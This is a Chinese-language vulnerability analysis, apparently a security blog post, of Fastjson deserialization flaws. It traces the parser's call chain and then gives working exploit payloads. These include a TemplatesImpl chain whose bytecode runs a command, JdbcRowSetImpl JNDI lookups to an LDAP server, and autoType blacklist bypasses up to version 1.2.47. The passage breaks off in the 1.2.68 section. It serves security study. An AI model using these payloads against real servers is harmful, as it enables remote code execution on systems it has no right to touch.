漏洞篇 - Fastjson 反序列化

Fastjson 介绍

Fastjson 是阿里巴巴开发的一个高性能 JSON 解析库，广泛应用于 Java 项目中。它的主要功能是对 JSON 数据进行序列化和反序列化，即将 Java 对象转换为 JSON 字符串，或者将 JSON 字符串解析为 Java 对象。Fastjson 的优势在于其速度和灵活性，特别是在处理大规模数据时性能表现良好。

快速入门

导入如下依赖：

<dependencies>
     <dependency>
          <groupId>com.alibaba</groupId>
          <artifactId>fastjson</artifactId>
          <version>1.2.24</version>
     </dependency>
</dependencies>

在 pojo 包下创建一个简单类：

package pojo;

public class User {
    private String name;
    private int id;

    public User(){
        System.out.println("无参构造");
    }

    public User(String name, int id) {
        System.out.println("有参构造");
        this.name = name;
        this.id = id;
    }

    @Override
    public String toString() {
        return "User{" +
                "name='" + name + '\'' +
                ", id=" + id +
                '}';
    }

    public String getName() {
        System.out.print("getName");
        return name;
    }

    public void setName(String name) {
        System.out.println("setName");
        this.name = name;
    }

    public int getId() {
        System.out.println("getId");
        return id;
    }

    public void setId(int id) {
        System.out.println("setId");
        this.id = id;
    }
}

序列化

调用 JSON 的 toJSONString 方法将对象转换为字符串：

import com.alibaba.fastjson.JSON;
import pojo.User;

public class base {
    public static void main(String[] args) {
        User user = new User("zhangsan",1);
        String json = JSON.toJSONString(user);
        System.out.println(json);
    }
}

输出结果如下：

可以看出，在调用 JSON.toJSONString 方法时调用了对象的 getter 方法获取属性值。

toJSONString 方法有很多重写：

在 Java 中，方法参数后面的三个点（…）代表可变参数（Varargs），即这个方法可以接受任意数量的该类型参数。在 Fastjson 中，SerializerFeature… features 意味着这个方法可以接受多个 SerializerFeature 枚举值，甚至可以不传递任何 SerializerFeature。

如果再多传入一个参数 SerializerFeature ，值为 SerializerFeature.WriteClassName ，就可以在序列化结果中多打印一个 @type：类名 ：

传入 SerializerFeature.WriteClassName 可以使得 Fastjson 支持自省，开启自省后序列化成 JSON 的数据就会多一个 @type ，这个是代表对象类型的 JSON 文本。

反序列化

反序列化时常使用的方法为 parse() 、parseObject() 、parseArray() ，这三个方法也均包含若干重载方法：

下面程序用来测试反序列化：

import com.alibaba.fastjson.JSON;
import pojo.User;

public class base2 {
    public static void main(String[] args) {
        String json = "{\"@type\":\"pojo.User\",\"id\":1,\"name\":\"zhangsan\"}";
        String json2 = "{\"id\":1,\"name\":\"zhangsan\"}";
        System.out.println(JSON.parseObject(json));
        System.out.println("----------------------------------");
        System.out.println(JSON.parseObject(json2));
        System.out.println("----------------------------------");
        System.out.println(JSON.parseObject(json, User.class));
        System.out.println("----------------------------------");
        System.out.println(JSON.parseObject(json2, User.class));
        System.out.println("----------------------------------");
        System.out.println(JSON.parse(json));
        System.out.println("----------------------------------");
        System.out.println(JSON.parse(json2));

    }
}

输出结果如下：

不同的方法和参数得到的结果也不同，其中：

1 2	JSON.parseObject(json2) JSON.parse(json2)

这两个方式的反序列化是失败的。

parse() 、parseObject()

来聊聊这两个方法。在上面的案例中可以知道，如果要成功反序列化出 User 对象，parseObject 就一定要指定第二个参数为 User.class ，而 parse 则一定要用 @type 指定要反序列化的类。

parseObject 方法如果不指定第二个参数，那么会返回 JSONObject 对象，而不是 User 对象：

1	JSON.parseObject(json)

并且像这样的调用方式会同时调用 User 的 getter/setter 方法。

getter/setter 方法的调用

可以发现，无论是序列化还是反序列化，都会调用其 getter 或 setter 方法。我们来跟进一下看看具体是在哪里调用的。

就以 JSON.parseObject(json) 这样的调用方式为例，跟进 JSON#parseObject(String)：

这里调用 parse 方法，跟进 JSON#parse(String)：

继续跟进 JSON#parse(String, int)：

这里先是调用 DefaultJSONParser 获取一个默认 Json 解析器，然后调用解析器的 parse 方法。

跟进 DefaultJSONParser#parse()：

跟进 DefaultJSONParser#parse(Object)：

直接进入了 case LBRACE 。JSONObject 的构造方法没什么可看的。

直接跟进 DefaultJSONParser#parseObject(final Map, Object)：

方法的中间调用了 config.getDeserializer 来获取一个反序列化器，我们先跟进它，也就是 ParserConfig#getDeserializer(Type)：

这里调用重载方法，跟进 ParserConfig#getDeserializer(Class<?>, Type)：

跟进 ParserConfig#createJavaBeanDeserializer(Class<?>, Type) ：

跟进 JavaBeanInfo#build(Class<?>, Type, PropertyNamingStrategy)：

这个方法比较重要，那些 getter/setter 方法就是在这里获取名称的。

在方法的中间遍历类中的所有 public 方法，过滤出符合条件的 setter 方法：

代码很长，这里就不放完了。总结起来就是：

判断 setter 方法：

方法名长度大于等于 4
不是静态方法
返回类型为空或当前类
参数个数为 1 个
方法上的 @JSONField 注解没有指定该字段不可反序列化
方法名以 “set” 开头

判断字段名：

char c3 = methodName.charAt(3); 获取方法名的第四个字符（即 setXyz 中的 X）

如果 c3 是大写字母，则字段名为 setXyz 中的 xyz 。
如果 c3 是下划线 _ ，则字段名为 set_xxx 中的 xxx 。
如果方法名的第五个字符是大写字符，则保留原来的大写风格。比如 setURL 保留 URL 作为字段名。
根据上述方法推导出来的字段名，通过反射去查找类中的实际字段。如果没有找到字段，并且方法参数是 boolean 类型，尝试将字段名前面加个 “is” ，改为 isXyz 形式重新查找字段。

后面再接着遍历类中的所有 public 方法，过滤出符合条件的 getter 方法：

同样总结一下获取 getter 方法的规则：

方法名长于 4
不是静态方法
以 get 开头且第 4 位是大写字母
没有参数
返回类型继承自 Collection|Map|AtomicBoolean|AtomicInteger|AtomicLong
对带有 @JSONField 注解的方法，优先使用注解中定义的属性名或选项。

build 方法的最后将该类的构造函数、字段、获取到的 setter/getter 方法以及其他与序列化和反序列化相关的信息都封装进了一个 JavaBeanInfo 对象：

好的，回到 DefaultJSONParser#parseObject(final Map, Object) ，我们接下来看下面的调用：

跟进 JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object)：

这里需要注意的是，如果直接进入下一步，会跟不进去：

这是由于 ParserConfig#createJavaBeanDeserializer(Class<?>, Type) 中设置 asmEnable 为 true 了。如果确实想跟进去看的话，可以在调试时将其值设置为 false 。asmEnable 是 true 的情况下，使用 asm 从字节码层面生成特定 javabean 的反序列化器，自然无法跟进去看了；为 false 的时候，则使用常规的 set 方法进行反序列化（效率低、不安全）。不过这两种方法生成的内容是一样的。

那么重新调试，再次调试到这里的时候，将其值设置为 false ：

继续调试到 JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object)，此时可以跟进了：

这里两个重载方法，一路跟到 JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object, Object, int)：

这个方法在经过一系列处理后，最终调用到了 fieldDeser.setValue 来为 User 对象赋值。

跟进 FieldDeserializer#setValue(Object, Object)：

这里就是最终调用 setter 方法的地方。

然而，如果说 json 字符串中的字段名与 JavaBeanInfo#build(Class<?>, Type, PropertyNamingStrategy) 方法获取到的 JavaBeanInfo 对象中存储的字段名不一致的话，那么 JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object, Object, int) 的 matchField 值为 false ，就会进入另一条分支，调用 parseField 方法来处理。比如我现在将 id 字段改为 _i_d_ ，但是 setter 方法还是叫 setId ：

跟进 JavaBeanDeserializer#parseField(DefaultJSONParser, String, Object, Type, Map<String, Object>)：

跟进 JavaBeanDeserializer#smartMatch(String)，这是一个比较关键的方法，如果匹配不一致的话，会判断 key 是否是 is 开头，或者将 key 中的 - 和 _ 去掉再比对：

也就是说即使字段名为 _i_d_ ，依然能够找到名为 setId 的 setter 方法。

若是走这条路，则是在 DefaultFieldDeserializer#parseField(DefaultJSONParser, Object, Type, Map<String, Object>) 中调用 setvalue 方法：

那么 getter 方法又在哪里调用呢？回到最初的 JSON#parseObject(String)：

现在 parse 这条路已经走完了，跟进 JSON#toJSON(Object)，这是一个将 Java 对象转为 Json 数据的方法：

跟进 JSON#toJSON(Object, SerializeConfig) ：

这里调用 javaBeanSerializer.getFieldValuesMap 来获取字段值的 Map 集合。

跟进 JavaBeanSerializer#getFieldValuesMap(Object)：

这里调用 getter.getPropertyValue 获取属性值。

跟进 FieldSerializer#getPropertyValue(Object) ：

跟进 FieldInfo#get(Object)：

这里就是调用 getter 方法的地方了。

调用链总结

于是可以总结出如下调用链：

JSON#parseObject(String)
*-> JSON#parse(String)
*   JSON#parse(String, int)
*   DefaultJSONParser#parse()
*   DefaultJSONParser#parse(Object)
*   DefaultJSONParser#parseObject(final Map, Object)
*   *-> ParserConfig#getDeserializer(Type)
*   *   ParserConfig#getDeserializer(Class<?>, Type)
*   *   ParserConfig#createJavaBeanDeserializer(Class<?>, Type) # 设置 asmEnable 为 false
*   *   JavaBeanInfo#build(Class<?>, Type, PropertyNamingStrategy) # 筛选 setter/getter 方法
*   *-> JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object)
*   *   JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object, int)
*   *   JavaBeanDeserializer#deserialze(DefaultJSONParser, Type, Object, Object, int)
*   *   *-> JavaBeanDeserializer#parseField(DefaultJSONParser, String, Object, Type, Map<String, Object>)
*   *   *   *-> JavaBeanDeserializer#smartMatch(String) # 字段名不一致，去除-_等符号再比对
*   *   *   *-> DefaultFieldDeserializer#parseField(DefaultJSONParser, Object, Type, Map<String, Object>)
*   *   *   *   FieldDeserializer#setValue(Object, Object) # 调用 setter/getter 方法
*   *   *-> FieldDeserializer#setValue(Object, Object) # 调用 setter/getter 方法
*-> JSON#toJSON(Object)
*   JSON#toJSON(Object, SerializeConfig)
*   JavaBeanSerializer#getFieldValuesMap(Object)
*   FieldSerializer#getPropertyValue(Object)
*   FieldInfo#get(Object) # 调用 getter 方法

其他的反序列化调用方式也大差不差。

特性总结

这里直接引用素十八师傅的总结（1.4.8. Fastjson 反序列化漏洞）：

使用 JSON.parse(jsonString) 和 JSON.parseObject(jsonString, Target.class)，两者调用链一致，前者会在 jsonString 中解析字符串获取 @type 指定的类，后者则会直接使用参数中的 class 。
fastjson 在创建一个类实例时会通过反射调用类中符合条件的 getter/setter 方法，其中 getter 方法需满足条件：方法名长于 4、不是静态方法、以 get 开头且第 4 位是大写字母、方法不能有参数传入、继承自 Collection|Map|AtomicBoolean|AtomicInteger|AtomicLong、此属性没有 setter 方法；setter 方法需满足条件：方法名长于 4，以 set 开头且第 4 位是大写字母、非静态方法、返回类型为 void 或当前类、参数个数为 1 个。具体逻辑在 com.alibaba.fastjson.util.JavaBeanInfo.build() 中。
使用 JSON.parseObject(jsonString) 将会返回 JSONObject 对象，且类中的所有 getter 与 setter 都被调用。
如果目标类中私有变量没有 setter 方法，但是在反序列化时仍想给这个变量赋值，则需要使用 Feature.SupportNonPublicField 参数。
fastjson 在为类属性寻找 get/set 方法时，调用函数 com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer#smartMatch() 方法，会忽略 _|- 字符串，也就是说哪怕你的字段名叫 _a_g_e_，getter 方法为 getAge()，fastjson 也可以找得到，在 1.2.36 版本及后续版本还可以支持同时使用 _ 和 - 进行组合混淆。
fastjson 在反序列化时，如果 Field 类型为 byte[]，将会调用com.alibaba.fastjson.parser.JSONScanner#bytesValue 进行 base64 解码，对应的，在序列化时也会进行 base64 编码。

这些特性对于分析反序列化漏洞有很大帮助，其中一部分已经在前面的代码分析中证明完成。

Fastjson 反序列化

fastjson 1.2.24

影响版本：fastjson <= 1.2.24

描述：fastjson 默认使用 @type 指定反序列化任意类，攻击者可以通过在 Java 常见环境中寻找能够构造恶意类的方法，通过反序列化的过程中调用的 getter/setter 方法，以及目标成员变量的注入来达到传参的目的，最终形成恶意调用链。此漏洞开启了 fastjson 反序列化漏洞的大门，为安全研究人员提供了新的思路。

TemplatesImpl 利用链

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 实现了 Serializable 接口，它可以被序列化。

具体来看 TemplatesImpl#getTransletInstance() 方法：

这是一个 getter 方法，但是不满足调用要求，它的返回类型是 Translet 。

再往上找，newTransformer() 方法调用了 getTransletInstance() ：

getOutputProperties() 方法又调用了 newTransformer() ：

getOutputProperties() 方法是成员属性 _outputProperties 的 getter 方法，它的返回类型是 Properties ，Properties 实现了 Map 接口，符合要求，反序列化时可以调用。

不过美中不足的是 _outputProperties 属性是私有的，而且没有 setter 方法，所以要用 Feature.SupportNonPublicField 参数才能给它赋值。

有关 TemplatesImpl 链的一些细节我已经在 CC3 的文章中分析清楚了，总结一下调用链：

TemplatesImpl#getOutputProperties()
TemplatesImpl#newTransformer()
TemplatesImpl#getTransletInstance()
 -> TemplatesImpl#defineTransletClasses()
    TransletClassLoader#defineClass() # 将 _class、_transletIndex 赋值
 -> Class#newInstance() # 初始化时执行静态代码块

下面直接给出测试用例：

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class TemplateImplTest {
    public static void main(String args[]) {
        try {
            byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\miaoj\\Documents\\Java安全代码实验\\FastjsonTest\\target\\classes\\pojo\\Eval.class"));
            String base64Code = Base64.getEncoder().encodeToString(code);
            String text1 = "{\n" +
                    "    \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\n" +
                    "    \"_bytecodes\": [\"" + base64Code + "\"],\n" +
                    "    \"_name\": \"miaoji\",\n" +
                    "    \"_tfactory\": {},\n" +
                    "    \"_outputProperties\": {},\n" +
                    "}";
            System.out.println(text1);

            JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);
            // JSON.parse(text1, Feature.SupportNonPublicField);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

这里我为 _bytecodes 传入的是一个 base64 编码的字节码，如果 JSON 中包含 Base64 编码的字符串，并且将它反序列化为 byte[] 类型的字段时，Fastjson 会自动尝试将该 Base64 字符串转换为字节数组。其中对应的解码操作在 JSONScanner#bytesValue() 中：

调用堆栈如下：

Eval.class 是 Eval 类编译后生成的字节码文件，Eval 类内容如下：

package pojo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class Eval extends AbstractTranslet {
    public Eval() {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException var1) {
            throw new RuntimeException(var1);
        }
    }
}

JdbcRowSetImpl 利用链

com.sun.rowset.JdbcRowSetImpl 这条利用链是由于 javax.naming.InitialContext#lookup() 参数可控导致的 JNDI 注入。

setAutoCommit，这是一个 setter 方法，调用了 connect 方法：

跟进 connect 方法：

这里会调用 lookup 方法进行 Jndi 远程调用。

getDataSourceName()：

所以只需要将 dataSource 设置成 JNDI 服务端地址就行。

调用链如下：

1
2
3

JdbcRowSetImpl#setAutoCommit(boolean)
JdbcRowSetImpl#connect()
InitialContext#lookup(String)

测试用例：

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;

public class JdbcRowSetImplTest {
    public static void main(String[] args) {
        String json = "{\n" +
                "    \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +
                "    \"dataSourceName\":\"ldap://127.0.0.1:10389/Command\",\n" +
                "    \"autoCommit\":true\n" +
                "}";
        JSONObject jsonObject = JSON.parseObject(json);
    }
}

fastjson 1.2.25

影响版本：1.2.25 <= fastjson <= 1.2.42

fastjson 1.2.25 引入了 checkAutoType 安全机制，采用黑白名单校验类是否可加载。默认情况下 autoTypeSupport 关闭，基于白名单实现安全机制，而打开 autoTypeSupport 之后，是基于内置黑名单来实现安全的，fastjson 也提供了添加黑名单的接口。

checkAutoType 安全机制

将依赖版本升级到 1.2.25 之后，再运行上面的 TemplatesImpl 链，会报错：

根据报错信息找到了 ParserConfig#checkAutoType(String, Class<?>)，在看这个方法之前，先说一下 ParserConfig 新增的一些属性：

autoTypeSupport 是新增的一个标志位，denyList 是黑名单，acceptList 是白名单。

黑名单中包含如下类：

bsh
com.mchange
com.sun.
java.lang.Thread,java.net.Socket
java.rmi,javax.xml
org.apache.bcel
org.apache.commons.beanutils
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors
org.apache.commons.collections4.comparators
org.apache.commons.fileupload
org.apache.myfaces.context.servlet
org.apache.tomcat
org.apache.wicket.util
org.codehaus.groovy.runtime
org.hibernate
org.jboss
org.mozilla.javascript
org.python.core
org.springframework

接着来看 ParserConfig#checkAutoType(String, Class<?>)，这个方法最主要的是几个 if 判断，反复使用黑白名单来验证。

$ 替换为 .，处理嵌套类；如果 autoTypeSupport 为 true ，那么先用白名单检查，再用黑名单检查，白名单检查通过的话可以直接加载类，而黑名单不会：

运行上面的 TemplateImplTest 代码时，这里的 expectClass 初始值为 null 。

如果 autoTypeSupport 为 false 的话，则先检查黑名单，再检查白名单。同样的是黑名单检查通过后也不能加载类：

如果上面的检查都通过了但是没有加载类的话，再检查一次 autoTypeSupport 是否为 true ，如果是就加载类。这是这个方法中最后一次加载类的地方了，也就是说如果 autoTypeSupport 为 false 的话，是不会加载任何类的。而 autoTypeSupport 默认为 false ：

最后会检查加载的类是否是 ClassLoader 或 DataSource 的子类，这里是不允许加载它们的：

绕过方法

在上面加载类的时候会调用 TypeUtils.loadClass 方法，跟进看一下：

这其中的处理逻辑是这样的：

如果 classname 以 [ 开头，就去掉第一个字符 [ ，然后返回对应的数组类。这是因为在 Java 中，数组类型的类与普通类不同，它们有独特的类名表示方式。对于一维数组，类名以 [ 开头，例如 int[] 对应的类名是 [I，对象数组如 String[] 对应的类名是 [Ljava.lang.String;。这里的代码就是处理这种数组类型的加载。

如果 className 以 L 开头并以 ; 结尾，那么去掉头尾再加载。在字节码和序列化中，对象类型可能会被表示为 L类名; 的形式。例如 java.lang.String 可能被表示为 Ljava/lang/String;。本来是用于处理这种格式的类名，这样看来倒算是一种逻辑漏洞了。

这里先利用第二种机制，只需要在类名开头加上 L ，结尾加上 ; 就可以了。

payload 如下：

{
    "@type":"Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName":"ldap://127.0.0.1:10389/Command8",
    "autoCommit":true
}

此外需要将 autoTypeSupport 设置为 true ，有两种办法。

第一种是全局设置：

1	ParserConfig.getGlobalInstance().setAutoTypeSupport(true)

第二种是为指定的类设置：

1	ParserConfig.getGlobalInstance().addAccept("com.example.YourClass")

fastjson 1.2.42

影响版本：1.2.25 <= fastjson <= 1.2.42

依然是关注 ParserConfig 这个类，主要有两个方面的改动，第一个就是黑名单采用 hash 的方式来表示类，不再是之前的明文了：

似乎是 FNV-1a 哈希算法（Fowler-Noll-Vo 哈希算法）的一种变体。hash 算法是不可逆的，无法还原出明文，但是可以通过 jackson 中的黑名单来撞库呢。

另一方面就是针对 checkAutoType 的改动，在做其他处理之前，首先针对以 L 开头并以 ; 结尾的 className 做了处理，去掉了开头和结尾：

这里也是采用了 hash 的方式进行了判断，虽然无法从代码直接看出想过滤什么字符，但是结合上个版本的问题也能猜出来。

此外，在原本判断黑白名单的地方也用 hash 的方式做了改动。作者这么做，想必是为了展示他深厚的功底，可以把相同的事物用不同的方式表达出来吧？

绕过方式也很容易想到，就是双写开头的 L 和结尾的 ; 。

payload：

{
    "@type":"LLcom.sun.rowset.JdbcRowSetImpl;;",
    "dataSourceName":"ldap://127.0.0.1:10389/Command8",
    "autoCommit":true
}

fastjson 1.2.43

影响版本：1.2.25 <= fastjson <= 1.2.43

改动依然是在 ParserConfig#checkAutoType(String, Class<?>, int) ，如果开头出现了连续两个 L ，那么会抛出异常：

这样双写绕过的方式就失效了。不过前面提到了 TypeUtils.loadClass 方法有两种处理机制，现在来研究一下第一种，就是类名前加个 [ ，那么我给出一个测试用例：

package fastjson1_2_43;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class TemplateImplTest {
    public static void main(String args[]) {
        try {
            // 开启 AutoTypeSupport
            ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

            byte[] code = Files.readAllBytes(Paths.get("C:\\Users\\miaoj\\Documents\\Java安全代码实验\\FastjsonTest\\target\\classes\\pojo\\Eval.class"));
            String base64Code = Base64.getEncoder().encodeToString(code);
            String text1 = "{" +
                    "\"@type\": \"[com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
                    "\"_bytecodes\": [\"" + base64Code + "\"]," +
                    "\"_name\": \"miaoji\"," +
                    "\"_tfactory\": {}," +
                    "\"_outputProperties\": {}," +
                    "}";
            System.out.println(text1);

            JSON.parseObject(text1, Object.class, Feature.SupportNonPublicField);
            // JSON.parse(text1, Feature.SupportNonPublicField);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

运行后会报错：

报错信息显示：某个位置需要一个 [ ，但是却给了一个 , ，在 position 72 ，大概是第 72 个字符的意思。刚好是类名后面那个逗号，那就在这里加个 [ 。

报错位置在 DefaultJSONParser.parseArray ：

加上 [ 后再次运行，还是报错：

position 73 需要一个 { ，就是前面加上的 [ 后面一个的位置，就再把它加上，这次运行成功了。

payload 就长这个样子：

{
    "@type": "[com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"[{,
    "_bytecodes": [base64Code],
    "_name": "miaoji",
    "_tfactory": {},
    "_outputProperties": {},
}

fastjson 1.2.44

影响版本：1.2.25 <= fastjson <= 1.2.44

fastjson 1.2.44 版本不但修复了上个版本 [ 开头导致的绕过问题，而且只要是 [ 开头，或是以 L 开头 ; 结尾，会直接抛出异常，而不是像之前那样简单的过滤了：

从代码逻辑上看，第一个 if 判断是否以 [ 开头，第二个 if 判断了是否以 L 开头并且以 ; 结尾。

这样的话就彻底杜绝了前面的几种绕过方式，果然是舍不得孩子套不着狼啊。

fastjson 1.2.45

影响版本：1.2.25 <= fastjson <= 1.2.45

1.2.45 版本曝出了新的可绕过黑名单的类 org.apache.ibatis.datasource.jndi.JndiDataSourceFactory ，这个类需要服务端有 mybatis 依赖 jar 包。

可以在我们的项目下手动添加一个：

<dependency>
    <groupId>org.mybatis</groupId>
    <artifactId>mybatis</artifactId>
    <version>3.5.13</version>
</dependency>

payload 如下：

{
    "@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "properties":{"data_source":"ldap://127.0.0.1:10389/Command8"}
}

事实上这个类也可以用来绕过前面所有版本的黑名单。

不过在 1.2.46 版本中被加入了黑名单：

version	hash	hex-hash	name
1.2.46	-8083514888460375884	0x8fd1960988bce8b4L	org.apache.ibatis.datasource

fastjson 1.2.47

影响版本：1.2.25 <= fastjson <= 1.2.32 未开启 AutoTypeSupport 以及 1.2.33 <= fastjson <= 1.2.47 。

ParserConfig 的 checkAutoType 方法中有一个机制其实在之前的版本中已经有了，只是我们在研究的时候选择性忽略了而已。而这个利用方式在 1.2.47 版本被曝出来。

这个特性就是如果在黑白名单中没有找到匹配的类，会尝试在 TypeUtils 的 mappings 属性和 deserializers 中查找，如果能找到的话可以直接返回：

在 autoTypeSupport 为 true 的情况下，会进入前面的判断机制，但就算这个类在黑名单中，只要 TypeUtils 的 mappings 属性中能找到这个类，也不会抛出异常：

如果 autoTypeSupport 为 false ，那就更是畅通无阻了。于是就给了我们利用空间。

接下来的问题就是如何将类加载进 TypeUtils.mappings 或者是 ParserConfig.deserializers 。

将类加载进 TypeUtils.mappings

先来看 TypeUtils.mappings ，能将其赋值的方法有 addBaseClassMappings() ，loadClass(Stringe, ClassLoader, boolean)。

addBaseClassMappings() 中是对一些基本类型的赋值，没有什么操作空间：

那么看 TypeUtils#loadClass(Stringe, ClassLoader, boolean)，可以看到，只要传入的 cache 不为空，就可以将传入的 className put 进 mappings 中：

在 TypeUtils 中，loadClass(Stringe, ClassLoader, boolean) 只有一处被调用，就是两个参数的重写方法 loadClass(String, ClassLoader )：

并且这里默认会将 cache 设置为 true 。

其实还有个一参重写方法调用了这个两参重写方法，但是它会将 classLoader 设置为空，而在三参重写方法中是要用到这个 classLoader 的，所以不考虑：

向上找两参的 loadClass 方法在哪被调用。

关注 com.alibaba.fastjson.serializer.MiscCodec#deserialze 方法，如果方法传入的参数 clazz 为 Class.class ，那么会调用两参的 loadClass 方法：

这里传入的第一个参数是 strVal ，作为类名。往上看看 strVal 在哪被赋值：

显然是被 objVal 赋值，描述类名用字符串，我没意见。

再往前看 objVal ，如果 parser.resolveStatus 是 DefaultJSONParser.TypeNameRedirect 的话，就能给 objVal 赋值了：

parser 也是传进来的参数，parser.parse() 这里面的调用链我就不分析了，简单总结一下：

DefaultJSONParser#parse()
DefaultJSONParser#parse(Object)
JSONScanner#stringVal()
JSONScanner#subString(int, int)

JSONScanner#subString(int, int)：

从 text 中取子串，至于取子串的位置早就设定好了，其实取的是 json 字符串的键名为 val 所对应的值。但是为什么从一开始就这么设定好了呢，这就不得不提到 lexer 这个 JSONScanner 扫描器对象了。

JSONScanner 扫描器

早在 JSON#parse 方法创建 DefaultJSONParser 对象的时候就创建了这个 JSONScanner 对象：

跟进去看构造方法：

注意这里的 input 就是我们最初传入的 json 字符串。在 JSONScanner 的构造方法中被赋值到 JSONScanner 对象的 text 属性中：

那么 text 的赋值搞清楚了。看 JSONScanner#stringVal() ：

这其中代表起始地址与长度的 np、sp 又是在何处赋值呢？

其实是 lexer.nextToken() 方法在改变 np、sp 的值，也就是 JSONScanner 的父类 JSONLexerBase 的 nextToken() 方法。

nextToken 会将 JSON 中的键或值解析成独立的词法单元。例如，在解析 JSON 对象 {"name": "John", "age": 30} 时，nextToken 依次识别并解析以下词法单元：

{：表示对象的开始，词法单元类型为 LBRACE
"name"：字符串类型的键，词法单元类型为 STRING
:：表示键和值的分隔符，词法单元类型为 COLON
"John"：字符串类型的值，词法单元类型为 STRING
,：表示下一个键值对的开始，词法单元类型为 COMMA
"age"：字符串类型的键，词法单元类型为 STRING
:：表示键和值的分隔符，词法单元类型为 COLON
30：数字类型的值，词法单元类型为 NUMBER
}：表示对象的结束，词法单元类型为 RBRACE

当 nextToken 方法识别到一个词法单元后，词法分析器（lexer）将准备好为下一个 nextToken 调用解析下一个词法单元。

回过头看 MiscCodec#deserialze(DefaultJSONParser, Type, Object)：

在做判断的时候判断当前词法单元是不是 “val” ，不是的话会抛出异常，是的话调用 nextToken ，假如 json 数据的格式是：{"val":"aaaaa"} 这样的形式，调用 nextToken 之后，当前的词法单元就是 : 了。

然后调用 parser.accept ，这里面其实也调用了 nextToken ，并且在调用之前会检查当前的词法单元是不是 : ：

那么这个 nextToken 调用完之后，当前的词法单元就是 “val” 键对应的值了。所以 objVal 获取到的就是 val 键对应的值。

ParserConfig.deserializers 的初始化

现在回到最初的那个问题：如何将类加载进 TypeUtils.mappings 或者是 ParserConfig.deserializers 。

接下来看看能否将类加载进 ParserConfig.deserializers 中，但是不能，deserializers 是 ParserConfig 的一个成员属性，定义的时候就初始化好了，并且只有在 ParserConfig#initDeserializers() 中才有添加的操作：

都是硬编码写好的，没有操作空间，所以不考虑。不过其中有一条，Class 类也在这个里面，这就意味着，如果反序列化的是 java.lang.Class 类，那么它能顺利通过 checkAutoType 的检测。

剩余利用链分析

DefaultJSONParser#parseObject(final Map, Object) 方法在遇到 Class 这样的类时，会调用 MiscCodec 类来反序列化它们，并且前面还会设置好 resolveStatus 为 TypeNameRedirect ，这就满足了 MiscCodec#deserialze 中给 objVal 赋值的条件：

DefaultJSONParser#parseObject(final Map, Object) 这个方法很有意思，遇到不同的类还会调用不同的类来处理它，比如遇到 Class 类调用 MiscCodec 类来反序列化，这应该就是在前面的 ParserConfig#initDeserializers() 中指定的。

payload

这部分思路理清了之后，给出一个 payload ：

{
    "object1": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "object2": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://127.0.0.1:10389/Command8",
        "autoCommit": true
    }
}

反序列化第一个类时，Class 能顺利通过 checkAutoType 的检查并返回，随后进入 MiscCodec#deserialze 中将 “com.sun.rowset.JdbcRowSetImpl” 字符串加载进 TypeUtils.mappings 。

反序列化第二个类的时候，由于 TypeUtils.mappings 中存在 “com.sun.rowset.JdbcRowSetImpl” ，即使黑名单匹配到了也不会抛出异常，并且能够成功返回。

漏洞修复

1.2.48 版本对这种利用方式进行了修复，首先就是将 TypeUtils 的两参 loadClass 方法调用三参方法时的 cache 默认设置为 false ：

这样就没有办法将类加载进 TypeUtils.mappings 了。

另一个更改的点就是 MiscCodec#deserialze(DefaultJSONParser, Type, Object) 直接调用 TypeUtils 的三参 loadClass 方法，并且将 cache 设置为 false ：

最后一个点就是似乎将 java.lang.Class 类加入黑名单了，当我调试到 ParserConfig#checkAutoType 时，第一次进入就直接抛出异常：

大概是将 java.lang.Class 类加入黑名单了。

fastjson 1.2.68

影响版本：fastjson <= 1.2.68

fastjson 1.2.68 版本在 ParserConfig 中新增了一个 safeMode 安全机制。在其 checkAutoType 方法中：

只要当前开启了安全模式 safeMode ，那么就会直接抛出异常，任何类都不能通过检查，那么就不能反序列化任何类。

另外，在 1.2.68 版本出现了一种新的绕过方式，利用点在 checkAutoType 方法的这个位置，如果能构造一个符合条件的 expectClass ，即要反序列化的类是传入的 expectClass 的子类，那么就能通过 checkAutoType 的检查：

当然这是在 safeMode 关闭的前提下才能利用。其实这个点在过往的版本中也都有，只是利用方式在 1.2.68 版本才发现而已。

expectClass 是三参 checkAutoType 方法的参数：

找一找哪里调用了这个三参 checkAutoType 方法并且将 expectClass 赋值了。

抛开将 expectClass 设置为 null 的情况，可以找到：

JavaBeanDeserializer#deserialzeArrayMapping
